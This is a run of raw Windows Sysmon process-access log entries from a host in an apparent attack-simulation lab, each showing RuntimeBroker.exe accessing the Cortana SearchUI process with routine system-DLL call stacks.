13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405276C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405200C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405200C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.179{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 